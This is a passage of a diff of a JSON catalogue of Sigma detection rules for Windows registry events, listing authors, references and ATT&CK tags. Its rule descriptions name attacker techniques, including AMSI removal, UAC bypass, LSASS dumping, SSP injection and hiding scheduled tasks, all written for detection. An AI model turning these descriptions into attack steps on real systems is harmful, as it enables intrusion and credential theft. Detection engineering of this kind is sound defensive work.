"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_exploit_guard_protected_folders.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "272e55a4-9e6b-4211-acb6-78f51f0b1b40", - "value": "Removal Of Folder From ProtectedFolders In Exploit Guard" - }, - { - "description": "Detects the deletion of registry keys containing the MSTSC connection history", - "meta": { - "author": "Christian Burkard", - "creation_date": "2021/10/19", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_delete_mstsc_history_cleared.yml", - "level": "high", - "logsource.category": "registry_delete", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/troubleshoot/windows-server/remote/remove-entries-from-remote-desktop-connection-computer", - "http://woshub.com/how-to-clear-rdp-connections-history/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_mstsc_history_cleared.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.t1112" - ] - }, - "uuid": "07bdd2f5-9c58-4f38-aec8-e101bb79ef8d", - "value": "Terminal Server Client Connection History Cleared" - }, - { - "description": "Remove the AMSI Provider registry key in HKLM\\Software\\Microsoft\\AMSI to disable AMSI inspection", - "meta": { - "author": "frack113", - "creation_date": "2021/06/07", - "falsepositive": [ - "Unlikely" - ], - "filename": "registry_delete_removal_amsi_registry_key.yml", - "level": "high", - "logsource.category": "registry_delete", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", - "https://seclists.org/fulldisclosure/2020/Mar/45", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_removal_amsi_registry_key.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ] - }, - "uuid": "41d1058a-aea7-4952-9293-29eaaf516465", - "value": "Removal Of Amsi Provider Reg Key" - }, - { - "description": "A General detection to trigger for processes removing .*\\shell\\open\\command registry keys. Registry keys that might have been used for COM hijacking activities.", - "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "creation_date": "2020/05/02", - "falsepositive": [ - "Legitimate software (un)installations are known to cause some false positives. Please add them as a filter when encountered" - ], - "filename": "registry_delete_removal_com_hijacking_registry_key.yml", - "level": "medium", - "logsource.category": "registry_delete", - "logsource.product": "windows", - "refs": [ - "https://github.com/OTRF/detection-hackathon-apt29/issues/7", - "https://threathunterplaybook.com/evals/apt29/detections/3.C.1_22A46621-7A92-48C1-81BF-B3937EB4FDC3.html", - "https://docs.microsoft.com/en-us/windows/win32/shell/launch", - "https://docs.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand", - "https://docs.microsoft.com/en-us/windows/win32/shell/shell-and-managed-code", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_removal_com_hijacking_registry_key.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ] - }, - "uuid": "96f697b0-b499-4e5d-9908-a67bec11cdb6", - "value": "Removal of Potential COM Hijacking Registry Keys" - }, - { - "description": "Detects when the \"index\" value of a scheduled task is removed or deleted from the registry. Which effectively hides it from any tooling such as \"schtasks /query\"", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/26", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_delete_removal_index_value_scheduled_task_hide.yml", - "level": "medium", - "logsource.category": "registry_delete", - "logsource.product": "windows", - "refs": [ - "https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_removal_index_value_scheduled_task_hide.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562" - ] - }, - "uuid": "526cc8bc-1cdc-48ad-8b26-f19bff969cec", - "value": "Removal Of Index Value to Hide Schedule Task" - }, - { - "description": "Remove SD (Security Descriptor) value in \\Schedule\\TaskCache\\Tree registry hive to hide schedule task. This technique is used by Tarrask malware", - "meta": { - "author": "Sittikorn S", - "creation_date": "2022/04/15", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_delete_removal_sd_value_scheduled_task_hide.yml", - "level": "medium", - "logsource.category": "registry_delete", - "logsource.product": "windows", - "refs": [ - "https://www.microsoft.com/security/blog/2022/04/12/tarrask-malware-uses-scheduled-tasks-for-defense-evasion/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_delete/registry_delete_removal_sd_value_scheduled_task_hide.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562" - ] - }, - "uuid": "acd74772-5f88-45c7-956b-6a7b36c294d2", - "value": "Removal Of SD Value to Hide Schedule Task" - }, - { - "description": "Sysmon registry detection of a local hidden user account.", - "meta": { - "author": "Christian Burkard", - "creation_date": "2021/05/03", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_event_add_local_hidden_user.yml", - "level": "high", - "logsource.category": "registry_event", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/SBousseaden/status/1387530414185664538", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_add_local_hidden_user.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1136.001" - ] - }, - "uuid": "460479f3-80b7-42da-9c43-2cc1d54dbccd", - "value": "Creation of a Local Hidden User Account by Registry" - }, - { - "description": "Detects Chafer activity attributed to OilRig as reported in Nyotron report in March 2018", - "meta": { - "author": "Florian Roth, Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", - "creation_date": "2018/03/23", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_event_apt_chafer_mar18.yml", - "level": "critical", - "logsource.category": "registry_event", - "logsource.product": "windows", - "refs": [ - "https://nyotron.com/nyotron-discovers-next-generation-oilrig-attacks/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_apt_chafer_mar18.yml" - ], - "tags": [ - "attack.persistence", - "attack.g0049", - "attack.t1053.005", - "attack.s0111", - "attack.t1543.003", - "attack.defense_evasion", - "attack.t1112", - "attack.command_and_control", - "attack.t1071.004" - ] - }, - "uuid": "7bdf2a7c-3acc-4091-9581-0a77dad1c5b5", - "value": "Chafer Activity - Registry" - }, - { - "description": "Detects registry key used by Leviathan APT in Malaysian focused campaign", - "meta": { - "author": "Aidan Bracher", - "creation_date": "2020/07/07", - "falsepositive": "No established falsepositives", - "filename": "registry_event_apt_leviathan.yml", - "level": "critical", - "logsource.category": "registry_event", - "logsource.product": "windows", - "refs": [ - "https://www.elastic.co/blog/advanced-techniques-used-in-malaysian-focused-apt-campaign", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_apt_leviathan.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ] - }, - "uuid": "70d43542-cd2d-483c-8f30-f16b436fd7db", - "value": "Leviathan Registry Key Activity" - }, - { - "description": "Detects registry keys created in OceanLotus (also known as APT32) attacks", - "meta": { - "author": "megan201296, Jonhnathan Ribeiro", - "creation_date": "2019/04/14", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_event_apt_oceanlotus_registry.yml", - "level": "critical", - "logsource.category": "registry_event", - "logsource.product": "windows", - "refs": [ - "https://www.welivesecurity.com/2019/03/20/fake-or-fake-keeping-up-with-oceanlotus-decoys/", - "https://github.com/eset/malware-ioc/tree/master/oceanlotus", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_apt_oceanlotus_registry.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ] - }, - "uuid": "4ac5fc44-a601-4c06-955b-309df8c4e9d4", - "value": "OceanLotus Registry Activity" - }, - { - "description": "Detects Pandemic Windows Implant", - "meta": { - "author": "Florian Roth", - "creation_date": "2017/06/01", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_event_apt_pandemic.yml", - "level": "critical", - "logsource.category": "registry_event", - "logsource.product": "windows", - "refs": [ - "https://wikileaks.org/vault7/#Pandemic", - "https://twitter.com/MalwareJake/status/870349480356454401", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_apt_pandemic.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1105" - ] - }, - "uuid": "47e0852a-cf81-4494-a8e6-31864f8c86ed", - "value": "Pandemic Registry Key" - }, - { - "description": "Unfixed method for UAC bypass from windows 10. WSReset.exe file associated with the Windows Store. It will run a binary file contained in a low-privilege registry.", - "meta": { - "author": "oscd.community, Dmitry Uchakin", - "creation_date": "2020/10/07", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_event_bypass_via_wsreset.yml", - "level": "high", - "logsource.category": "registry_event", - "logsource.product": "windows", - "refs": [ - "https://www.bleepingcomputer.com/news/security/trickbot-uses-a-new-windows-10-uac-bypass-to-launch-quietly", - "https://lolbas-project.github.io/lolbas/Binaries/Wsreset", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_bypass_via_wsreset.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ] - }, - "uuid": "6ea3bf32-9680-422d-9f50-e90716b12a66", - "value": "UAC Bypass Via Wsreset" - }, - { - "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", - "meta": { - "author": "Nik Seetharaman", - "creation_date": "2018/07/16", - "falsepositive": [ - "Legitimate CMSTP use (unlikely in modern enterprise environments)" - ], - "filename": "registry_event_cmstp_execution_by_registry.yml", - "level": "high", - "logsource.category": "registry_event", - "logsource.product": "windows", - "refs": [ - "https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_cmstp_execution_by_registry.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1218.003", - "attack.g0069", - "car.2019-04-001" - ] - }, - "uuid": "b6d235fc-1d38-4b12-adbe-325f06728f37", - "value": "CMSTP Execution Registry Event" - }, - { - "description": "Detects the addition of a key 'MiniNt' to the registry. Upon a reboot, Windows Event Log service will stopped write events.", - "meta": { - "author": "Ilyas Ochkov, oscd.community", - "creation_date": "2019/10/25", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_event_disable_security_events_logging_adding_reg_key_minint.yml", - "level": "high", - "logsource.category": "registry_event", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/0gtweet/status/1182516740955226112", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_disable_security_events_logging_adding_reg_key_minint.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001", - "attack.t1112" - ] - }, - "uuid": "919f2ef0-be2d-4a7a-b635-eb2b41fde044", - "value": "Disable Security Events Logging Adding Reg Key MiniNt" - }, - { - "description": "Detects potential malicious modification of the property value of IsCredGuardEnabled from\nHKLM:\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest to disable Cred Guard on a system.\nThis is usually used with UseLogonCredential to manipulate the caching credentials.\n", - "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "creation_date": "2019/08/25", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_event_disable_wdigest_credential_guard.yml", - "level": "high", - "logsource.category": "registry_event", - "logsource.product": "windows", - "refs": [ - "https://teamhydra.blog/2020/08/25/bypassing-credential-guard/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_disable_wdigest_credential_guard.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ] - }, - "uuid": "1a2d6c47-75b0-45bd-b133-2c0be75349fd", - "value": "Wdigest CredGuard Registry Modification" - }, - { - "description": "Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\VSS\\\\Diag\\\\VolSnap\\\\Volume are captured.", - "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "creation_date": "2020/10/20", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_event_esentutl_volume_shadow_copy_service_keys.yml", - "level": "high", - "logsource.category": "registry_event", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_esentutl_volume_shadow_copy_service_keys.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.002" - ] - }, - "uuid": "5aad0995-46ab-41bd-a9ff-724f41114971", - "value": "Esentutl Volume Shadow Copy Service Keys" - }, - { - "description": "Detects the use of Windows Credential Editor (WCE)", - "meta": { - "author": "Florian Roth", - "creation_date": "2019/12/31", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_event_hack_wce_reg.yml", - "level": "critical", - "logsource.category": "registry_event", - "logsource.product": "windows", - "refs": [ - "https://www.ampliasecurity.com/research/windows-credentials-editor/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_hack_wce_reg.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0005" - ] - }, - "uuid": "a6b33c02-8305-488f-8585-03cb2a7763f2", - "value": "Windows Credential Editor Registry" - }, - { - "description": "Detects the installation of the Azure Hybrid Connection Manager service to allow remote code execution from Azure function.", - "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "creation_date": "2021/04/12", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_event_hybridconnectionmgr_svc_installation.yml", - "level": "high", - "logsource.category": "registry_event", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/Cyb3rWard0g/status/1381642789369286662", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_hybridconnectionmgr_svc_installation.yml" - ], - "tags": [ - "attack.resource_development", - "attack.t1608" - ] - }, - "uuid": "ac8866c7-ce44-46fd-8c17-b24acff96ca8", - "value": "HybridConnectionManager Service Installation - Registry" - }, - { - "description": "Detects the presence of a registry key created during Azorult execution", - "meta": { - "author": "Trent Liffick", - "creation_date": "2020/05/08", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_event_mal_azorult.yml", - "level": "critical", - "logsource.category": "registry_event", - "logsource.product": "windows", - "refs": [ - "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/trojan.win32.azoruit.a", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_mal_azorult.yml" - ], - "tags": [ - "attack.execution", - "attack.t1112" - ] - }, - "uuid": "f7f9ab88-7557-4a69-b30e-0a8f91b3a0e7", - "value": "Registry Entries For Azorult Malware" - }, - { - "description": "Detects FlowCloud malware from threat group TA410.", - "meta": { - "author": "NVISO", - "creation_date": "2020/06/09", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_event_mal_flowcloud.yml", - "level": "critical", - "logsource.category": "registry_event", - "logsource.product": "windows", - "refs": [ - "https://www.proofpoint.com/us/blog/threat-insight/ta410-group-behind-lookback-attacks-against-us-utilities-sector-returns-new", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_mal_flowcloud.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1112" - ] - }, - "uuid": "5118765f-6657-4ddb-a487-d7bd673abbf1", - "value": "FlowCloud Malware" - }, - { - "description": "Detects static QMS 810 and mimikatz driver name used by Mimikatz as exploited in CVE-2021-1675 and CVE-2021-34527", - "meta": { - "author": "Markus Neis, @markus_neis, Florian Roth", - "creation_date": "2021/07/04", - "falsepositive": [ - "Legitimate installation of printer driver QMS 810, Texas Instruments microLaser printer (unlikely)" - ], - "filename": "registry_event_mimikatz_printernightmare.yml", - "level": "critical", - "logsource.category": "registry_event", - "logsource.product": "windows", - "refs": [ - "https://github.com/gentilkiwi/mimikatz/commit/c21276072b3f2a47a21e215a46962a17d54b3760", - "https://www.lexjansen.com/sesug/1993/SESUG93035.pdf", - "https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/4464eaf0-f34f-40d5-b970-736437a21913", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_mimikatz_printernightmare.yml" - ], - "tags": [ - "attack.execution", - "attack.t1204", - "cve.2021.1675", - "cve.2021.34527" - ] - }, - "uuid": "ba6b9e43-1d45-4d3c-a504-1043a64c8469", - "value": "PrinterNightmare Mimimkatz Driver Name" - }, - { - "description": "Detects value modification of registry key containing path to binary used as screensaver.", - "meta": { - "author": "Bartlomiej Czyz @bczyz1, oscd.community", - "creation_date": "2020/10/11", - "falsepositive": [ - "Legitimate modification of screensaver" - ], - "filename": "registry_event_modify_screensaver_binary_path.yml", - "level": "medium", - "logsource.category": "registry_event", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md", - "https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_modify_screensaver_binary_path.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.002" - ] - }, - "uuid": "67a6c006-3fbe-46a7-9074-2ba3b82c3000", - "value": "Path To Screensaver Binary Modified" - }, - { - "description": "Detects abusing Windows 10 Narrator's Feedback-Hub", - "meta": { - "author": "Dmitriy Lifanov, oscd.community", - "creation_date": "2019/10/25", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_event_narrator_feedback_persistance.yml", - "level": "high", - "logsource.category": "registry_event", - "logsource.product": "windows", - "refs": [ - "https://giuliocomi.blogspot.com/2019/10/abusing-windows-10-narrators-feedback.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_narrator_feedback_persistance.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ] - }, - "uuid": "f663a6d9-9d1b-49b8-b2b1-0637914d199a", - "value": "Narrator's Feedback-Hub Persistence" - }, - { - "description": "Detects NetNTLM downgrade attack", - "meta": { - "author": "Florian Roth, wagga", - "creation_date": "2018/03/20", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_event_net_ntlm_downgrade.yml", - "level": "high", - "logsource.category": "registry_event", - "logsource.product": "windows", - "refs": [ - "https://www.optiv.com/blog/post-exploitation-using-netntlm-downgrade-attacks", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_net_ntlm_downgrade.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001", - "attack.t1112" - ] - }, - "uuid": "d67572a0-e2ec-45d6-b8db-c100d14b8ef2", - "value": "NetNTLM Downgrade Attack - Registry" - }, - { - "description": "Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs value in the Registry key can be abused to obtain persistence and privilege escalation\nby causing a malicious DLL to be loaded and run in the context of separate processes on the computer.\n", - "meta": { - "author": "Ilyas Ochkov, oscd.community", - "creation_date": "2019/10/25", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_event_new_dll_added_to_appcertdlls_registry_key.yml", - "level": "medium", - "logsource.category": "registry_event", - "logsource.product": "windows", - "refs": [ - "http://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/", - "https://eqllib.readthedocs.io/en/latest/analytics/14f90406-10a0-4d36-a672-31cabe149f2f.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_new_dll_added_to_appcertdlls_registry_key.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1546.009" - ] - }, - "uuid": "6aa1d992-5925-4e9f-a49b-845e51d1de01", - "value": "New DLL Added to AppCertDlls Registry Key" - }, - { - "description": "DLLs that are specified in the AppInit_DLLs value in the Registry key HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows are loaded by user32.dll into every process that loads user32.dll", - "meta": { - "author": "Ilyas Ochkov, oscd.community, Tim Shelton", - "creation_date": "2019/10/25", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_event_new_dll_added_to_appinit_dlls_registry_key.yml", - "level": "medium", - "logsource.category": "registry_event", - "logsource.product": "windows", - "refs": [ - "https://eqllib.readthedocs.io/en/latest/analytics/822dc4c5-b355-4df8-bd37-29c458997b8f.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_new_dll_added_to_appinit_dlls_registry_key.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1546.010" - ] - }, - "uuid": "4f84b697-c9ed-4420-8ab5-e09af5b2345d", - "value": "New DLL Added to AppInit_DLLs Registry Key" - }, - { - "description": "Detects the addition of office test registry that allows a user to specify an arbitrary DLL that will be executed every time an Office application is started", - "meta": { - "author": "omkar72", - "creation_date": "2020/10/25", - "falsepositive": [ - "Unlikely" - ], - "filename": "registry_event_office_test_regadd.yml", - "level": "medium", - "logsource.category": "registry_event", - "logsource.product": "windows", - "refs": [ - "https://attack.mitre.org/techniques/T1137/002/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_office_test_regadd.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1137.002" - ] - }, - "uuid": "3d27f6dd-1c74-4687-b4fa-ca849d128d1c", - "value": "Office Application Startup - Office Test" - }, - { - "description": "Detects persistence registry keys for Recycle Bin", - "meta": { - "author": "frack113", - "creation_date": "2021/11/18", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_event_persistence_recycle_bin.yml", - "level": "high", - "logsource.category": "registry_event", - "logsource.product": "windows", - "refs": [ - "https://github.com/vxunderground/VXUG-Papers/blob/751edb8d50f95bd7baa730adf2c6c3bb1b034276/The%20Persistence%20Series/Persistence%20via%20Recycle%20Bin/Persistence_via_Recycle_Bin.pdf", - "https://persistence-info.github.io/Data/recyclebin.html", - "https://www.hexacorn.com/blog/2018/05/28/beyond-good-ol-run-key-part-78-2/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_persistence_recycle_bin.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547" - ] - }, - "uuid": "277efb8f-60be-4f10-b4d3-037802f37167", - "value": "Registry Persistence Mechanisms in Recycle Bin" - }, - { - "description": "Detects the modification of PortProxy registry key which is used for port forwarding. For command execution see rule win_netsh_port_fwd.yml.", - "meta": { - "author": "Andreas Hunkeler (@Karneades)", - "creation_date": "2021/06/22", - "falsepositive": [ - "WSL2 network bridge PowerShell script used for WSL/Kubernetes/Docker (e.g. https://github.com/microsoft/WSL/issues/4150#issuecomment-504209723)", - "Synergy Software KVM (https://symless.com/synergy)" - ], - "filename": "registry_event_portproxy_registry_key.yml", - "level": "medium", - "logsource.category": "registry_event", - "logsource.product": "windows", - "refs": [ - "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html", - "https://adepts.of0x.cc/netsh-portproxy-code/", - "https://www.dfirnotes.net/portproxy_detection/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_portproxy_registry_key.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.defense_evasion", - "attack.command_and_control", - "attack.t1090" - ] - }, - "uuid": "a54f842a-3713-4b45-8c84-5f136fdebd3c", - "value": "PortProxy Registry Key" - }, - { - "description": "Detects actions caused by the RedMimicry Winnti playbook", - "meta": { - "author": "Alexander Rausch", - "creation_date": "2020/06/24", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_event_redmimicry_winnti_reg.yml", - "level": "high", - "logsource.category": "registry_event", - "logsource.product": "windows", - "refs": [ - "https://redmimicry.com", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_redmimicry_winnti_reg.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ] - }, - "uuid": "5b175490-b652-4b02-b1de-5b5b4083c5f8", - "value": "RedMimicry Winnti Playbook Registry Manipulation" - }, - { - "description": "Detects potential malicious modification of run keys by winekey or team9 backdoor", - "meta": { - "author": "omkar72", - "creation_date": "2020/10/30", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_event_runkey_winekey.yml", - "level": "high", - "logsource.category": "registry_event", - "logsource.product": "windows", - "refs": [ - "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_runkey_winekey.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547" - ] - }, - "uuid": "b98968aa-dbc0-4a9c-ac35-108363cbf8d5", - "value": "WINEKEY Registry Modification" - }, - { - "description": "Rule to detect the configuration of Run Once registry key. Configured payload can be run by runonce.exe /AlternateShellStartup", - "meta": { - "author": "Avneet Singh @v3t0_, oscd.community", - "creation_date": "2020/11/15", - "falsepositive": [ - "Legitimate modification of the registry key by legitimate program" - ], - "filename": "registry_event_runonce_persistence.yml", - "level": "medium", - "logsource.category": "registry_event", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/pabraeken/status/990717080805789697", - "https://lolbas-project.github.io/lolbas/Binaries/Runonce/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_runonce_persistence.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ] - }, - "uuid": "c74d7efc-8826-45d9-b8bb-f04fac9e4eff", - "value": "Run Once Task Configuration in Registry" - }, - { - "description": "Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62)", - "meta": { - "author": "Christian Burkard", - "creation_date": "2021/08/30", - "falsepositive": [ - "Unknown" - ], - "filename": "registry_event_shell_open_keys_manipulation.yml", - "level": "high", - "logsource.category": "registry_event", - "logsource.product": "windows", - "refs": [ - "https://github.com/hfiref0x/UACME", - "https://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/", - "https://github.com/RhinoSecurityLabs/Aggressor-Scripts/tree/master/UACBypass", - "https://tria.ge/211119-gs7rtshcfr/behavioral2 [Lokibot sample from Nov 2021]", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_shell_open_keys_manipulation.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "attack.t1546.001" - ] - }, - "uuid": "152f3630-77c1-4284-bcc0-4cc68ab2f6e7", - "value": "Shell Open Registry Keys Manipulation" - }, - { - "description": "Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/02/26", - "falsepositive": [ - "Unlikely" - ], - "filename": "registry_event_silentprocessexit_lsass.yml", - "level": "critical", - "logsource.category": "registry_event", - "logsource.product": "windows", - "refs": [ - "https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/", - "https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_silentprocessexit_lsass.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003.007" - ] - }, - "uuid": "55e29995-75e7-451a-bef0-6225e2f13597", - "value": "SilentProcessExit Monitor Registration for LSASS" - }, - { - "description": "Detects the addition of a SSP to the registry. Upon a reboot or API call, SSP DLLs gain access to encrypted and plaintext passwords stored in Windows.", - "meta": { - "author": "iwillkeepwatch", - "creation_date": "2019/01/18", - "falsepositive": [ - "Unlikely" - ], - "filename": "registry_event_ssp_added_lsa_config.yml", - "level": "critical", - "logsource.category": "registry_event", - "logsource.product": "windows", - "refs": [ - "https://powersploit.readthedocs.io/en/latest/Persistence/Install-SSP/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_ssp_added_lsa_config.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.005" - ] - }, - "uuid": "eeb30123-9fbd-4ee8-aaa0-2e545bbed6dc", - "value": "Security Support Provider (SSP) Added to LSA Configuration" - }, - { - "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", - "meta": { - "author": "Florian Roth, @twjackomo, Jonhnathan Ribeiro, oscd.community", - "creation_date": "2018/03/15", - "falsepositive": [ - "Unlikely" - ], - "filename": "registry_event_stickykey_like_backdoor.yml", - "level": "critical", - "logsource.category": "registry_event", - "logsource.product": "windows", - "refs": [ - "https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/", - "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_event/registry_event_stickykey_like_backdoor.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.008", - "car.2014-11-003", - "car.2014-11-008" - ] - }, - "uuid": "baca5663-583c-45f9-b5dc-ea96a22ce542", - "value": "Sticky Key Like Backdoor Usage - Registry" - }, - { - "description": "Detects creation/modification of Assistive Technology applications and persistence with usage of 'at'", - "meta": { - "author": "Mateusz Wydra, oscd.community", - "creation_date": "2020/10/13", 